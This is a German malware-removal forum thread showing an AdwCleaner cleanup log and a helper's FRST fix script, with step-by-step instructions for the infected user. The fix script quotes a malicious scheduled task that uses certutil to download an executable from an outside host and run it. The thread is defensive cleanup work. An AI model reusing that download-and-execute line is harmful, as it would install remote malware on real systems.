Deleted       C:\Windows\SysWOW64\findit.xml
Deleted       C:\Windows\System32\drivers\Winmon.sys
Deleted       C:\Windows\System32\drivers\WinmonFS.sys
Deleted       C:\Windows\System32\drivers\WinmonProcessMonitor.sys

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Deleted       C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\ScheduledUpdate
Deleted       C:\Windows\System32\Tasks\ReimageUpdater
Deleted       C:\Windows\System32\Tasks\WindowsRecoveryCleaner

***** [ Registry ] *****

Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted       HKLM\Software\Wow6432Node\mtSubair
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Subair.exe
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted       HKLM\Software\Wow6432Node\Classes\CLSID\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted       HKLM\Software\Classes\CLSID\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted       HKCU\Software\Microsoft\BigTime
Deleted       HKU\S-1-5-18\Software\ByteFence
Deleted       HKU\.DEFAULT\Software\ByteFence
Deleted       HKLM\Software\Wow6432Node\RegisteredApplications|FLV and Media Player
Deleted       HKLM\SOFTWARE\RegisteredApplications|FLV and Media Player
Deleted       HKCU\Software\FastDataX
Deleted       HKCU\Software\EpicNet Inc.
Deleted       HKCU\Software\csastats
Deleted       HKLM\Software\Microsoft\DMunversion
Deleted       HKCU\Software\CoinisRevShare
Deleted       HKCU\Software\ParetoLogic
Deleted       HKLM\Software\Wow6432Node\ParetoLogic
Deleted       HKCU\Software\WebDiscoverBrowser
Deleted       HKLM\Software\Wow6432Node\WebDiscoverBrowser
Deleted       HKLM\Software\WebDiscoverBrowser
Deleted       HKLM\Software\Wow6432Node\Classes\AppID\REI_AxControl.DLL
Deleted       HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Deleted       HKLM\Software\Wow6432Node\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted       HKLM\Software\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted       HKLM\Software\Wow6432Node\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted       HKLM\Software\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted       HKLM\Software\Wow6432Node\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted       HKLM\Software\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted       HKLM\Software\Wow6432Node\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted       HKLM\Software\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted       HKLM\Software\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted       HKLM\Software\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted       HKLM\System\CurrentControlSet\Services\EventLog\Application\Application Hosting
Deleted       HKCU\Software\PRODUCTSETUP
Deleted       HKCU\Software\Reimage
Deleted       HKLM\Software\Reimage
Deleted       HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater
Deleted       HKCU\Environment|SNP
Deleted       HKCU\Environment|SNF
Deleted       HKCU\Software\System Healer
Deleted       HKCU\Software\MICROSOFT\wewewe
Deleted       HKLM\Software\Wow6432Node\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
Deleted       HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
Deleted       HKCU\Software\Microsoft\{cc6eb6d8-85b7-435p-8b86-51e4d16ea76d}
Deleted       HKLM\Software\Microsoft\PrIncub
Deleted       HKLM\Software\Microsoft\MPrForShutT
Deleted       HKLM\Software\Microsoft\PrAmNP
Deleted       HKLM\Software\Microsoft\NSaveA
Deleted       HKLM\Software\Microsoft\APreSam
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{5b0c3e0d-0e9b-4ebd-a5de-222a48f16015}
Deleted       HKCU\Software\WidModule
Deleted       HKLM\Software\texttotalk
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsRecoveryCleaner

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete IFEO
[+] Delete Prefetch
[+] Delete Tracing Keys
[+] Reset BITS
[+] Reset Windows Firewall
[+] Reset Chromium Policies
[+] Reset IE Policies
[+] Reset Proxy Settings
[+] Reset Winsock

*************************


########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
         

Servus,


du hast dreimal die fixlog.txt gepostet...

Es fehlt die eine Logdatei von FRST (FRST.txt), bitte in Code-Box nachreichen.

Dann kann es weitergehen.

Danke!

Sorry

ist zu groß für die Code-Box

Servus,




bitte bis auf Weiteres nichts mehr installieren oder deinstallieren!

Der erste FRST-Fix lief nicht durch, daher versuchen wir es jetzt so:




Schritt 1

• Kopiere den gesamten Inhalt der folgenden Code-Box:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  Start::
  HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
  HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
  C:\Program Files\SystemaRev
  S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
  C:\ProgramData\Microsoft\Windows\WNetworkMgmt
  S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
  S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
  S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
  S3 VGPU; System32\drivers\rdvgkmd.sys [X]
  R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
  R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
  R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
  C:\Windows\System32\drivers\WinmonProcessMonitor.sys
  C:\Windows\System32\drivers\WinmonFS.sys
  C:\Windows\System32\drivers\Winmon.sys
  2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
  2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
  2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
  2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
  2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
  2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
  2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
  2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
  2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
  2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
  2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
  2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
  2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
  2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
  2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
  2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
  2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
  2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
  2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
  2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
  2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
  2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
  2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
  2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
  2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
  2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
  2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
  2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
  2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
  2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
  2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
  2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
  2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
  2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
  2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
  2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
  2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
  2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
  2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
  2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
  2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
  2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
  2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
  2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
  2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
  2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
  2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
  2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
  2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
  2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
  2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
  2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
  ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
  C:\Windows\system32\mcicda64.dll
  Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
  C:\Program Files\Social Software
  Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
  C:\Program Files\SystemaRev
  Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
  Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
  Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
  C:\Program Files (x86)\nodejs
  Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
  Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
  Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
  Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
  Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
  Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
  Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
  C:\Program Files\Reimage
  Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
  C:\ProgramData\Iostream.exe
  ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
  AlternateDataStreams: C:\ProgramData:NT [40]
  AlternateDataStreams: C:\ProgramData:NT2 [552]
  AlternateDataStreams: C:\Users\All Users:NT [40]
  AlternateDataStreams: C:\Users\All Users:NT2 [552]
  AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
  AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
  AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
  AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
  AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
  AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
  AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
  AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
  AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
  AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
  AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
  Unlock: C:\Windows\system32\Drivers\etc\hosts
  C:\Windows\system32\Drivers\etc\hosts
  Hosts:
  VirusTotal: C:\Windows\system32\ntkrnlmp.exe
  VirusTotal: C:\Windows\system32\osloader.exe
  VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
  CMD: dir "%ProgramFiles%"
  CMD: dir "%ProgramFiles(x86)%"
  CMD: dir "%ProgramData%"
  CMD: dir "%Appdata%"
  CMD: dir "%LocalAppdata%"
  CMD: dir "%CommonProgramFiles(x86)%"
  CMD: dir "%CommonProgramW6432%"
  CMD: dir "%UserProfile%"
  CMD: dir "C:\"
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  RemoveProxy:
  CMD: ipconfig /flushdns
  cmd: netsh winsock reset catalog
  cmd: netsh advfirewall reset
  cmd: netsh advfirewall set allprofiles state ON
  cmd: Bitsadmin /Reset /Allusers
  EmptyTemp:
  End::
           

• Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
• Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
• Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
• Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Schritt 2

• Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
• FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
• Poste mir beide Logdateien mit deiner nächsten Antwort.

Bitte poste mit deiner nächsten Antwort

• die Logdatei des FRST-Fix (fixlog.txt),
• die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).